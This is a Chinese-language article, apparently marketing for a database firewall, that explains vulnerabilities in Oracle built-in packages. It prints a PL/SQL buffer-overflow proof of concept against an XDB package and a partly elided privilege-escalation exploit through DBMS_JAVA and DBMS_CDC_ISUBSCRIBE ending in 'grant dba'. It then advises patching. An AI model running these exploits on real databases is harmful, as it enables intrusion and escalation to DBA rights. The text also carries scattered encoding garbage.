許多數(shù)據(jù)庫(kù)系統(tǒng)都提供大量?jī)?nèi)建的存儲(chǔ)過程和軟件包��。這些存儲(chǔ)過程對(duì)象為數(shù)據(jù)庫(kù)提供了額外的幫助����,同時(shí)幫助管理員和開發(fā)者管理數(shù)據(jù)庫(kù)系統(tǒng)。
例如目前用戶量最廣的Oracle數(shù)據(jù)庫(kù)�����,默認(rèn)情況下在安裝時(shí)便擁有多達(dá)30000個(gè)可以公開訪問的對(duì)象����,這些對(duì)象為許多任務(wù)(包括訪問OS文件、發(fā)送HTTP請(qǐng)求、管理XML對(duì)象�����、java服務(wù)以及支持復(fù)制)提供相應(yīng)的功能�。這些功能都會(huì)在網(wǎng)絡(luò)上開啟對(duì)應(yīng)端口�����,而每多開一個(gè)網(wǎng)絡(luò)端口就為數(shù)據(jù)庫(kù)安全造成多一份入侵威脅����。
這些內(nèi)建對(duì)象包含的漏洞覆蓋了:SQL注入、緩沖區(qū)溢出和應(yīng)用程序邏輯漏洞等����。Oracle的內(nèi)建包中含有大量這種漏洞,我們下面就拿一個(gè)XDB上緩沖區(qū)溢出的漏洞舉例�。
Declare
buff varchar2(32767);
begin
buff :=’12345678901234567890123456789’;
buff :=buff||buff;
buff :=buff||buff;
buff :=buff||buff;
buff :=buff||buff;
buff :=buff||buff;
buff :=’12345678901234567890123456789’;
XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
end;
同樣java也存在大量此種漏洞�����,并且危害比上面的XDB還嚴(yán)重
…..DBMS_JAVA.SET_OUTPUT_TO_JAVA(‘ID’,’oracle/aurora/rdbms/DbmsJava’,’SYS’,’writeOutputToFile’,’TEXT’,NULL,NULL,NULL,NULL 0,1,1,1,1,0,’ DECLARE PRAG…….
EXEC DBMS_CDC_ISUBSCRIBE……
上面這個(gè)漏洞是針對(duì)ORACLE 11.1系列 的JAVA漏洞����。利用DBMS_CDC_ISUBSCRIBE 包可被 任意帳號(hào)執(zhí)行���,但這個(gè)包的創(chuàng)建者是sys。如果執(zhí)行DBMS_CDC_ISUBSCRIBE 的回話是sys���,就可以執(zhí)行sys權(quán)限(提權(quán)到DBA)DBMS_JAVA.SET_OUTPUT_TO_JAVA 函數(shù)可以把system.err的java重定向到一個(gè)新的會(huì)話中���。于是我們故意輸入錯(cuò)誤參數(shù)導(dǎo)致DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOW 產(chǎn)生錯(cuò)誤,并把錯(cuò)誤寫入到system.err中���。同時(shí)創(chuàng)建一個(gè)新SYS權(quán)限會(huì)話 �����。真正被執(zhí)行的語(yǔ)句是 EXECUTE IMMEDIATE "grant dba to user()"
我們從上面的例子中不難看出這種漏洞對(duì)于數(shù)據(jù)庫(kù)安全的危害很大�����。建議數(shù)據(jù)庫(kù)的使用者及時(shí)更新數(shù)據(jù)庫(kù)廠商發(fā)布的官方補(bǔ)丁����,同時(shí)關(guān)閉不必要的對(duì)象以及對(duì)應(yīng)端口�����。如果由于某種原因無法對(duì)數(shù)據(jù)庫(kù)進(jìn)行補(bǔ)丁升級(jí),建議使用帶VPATCH功能的數(shù)據(jù)庫(kù)防火墻保護(hù)數(shù)據(jù)庫(kù)安全�����。
產(chǎn)品咨詢:4000 258 365 
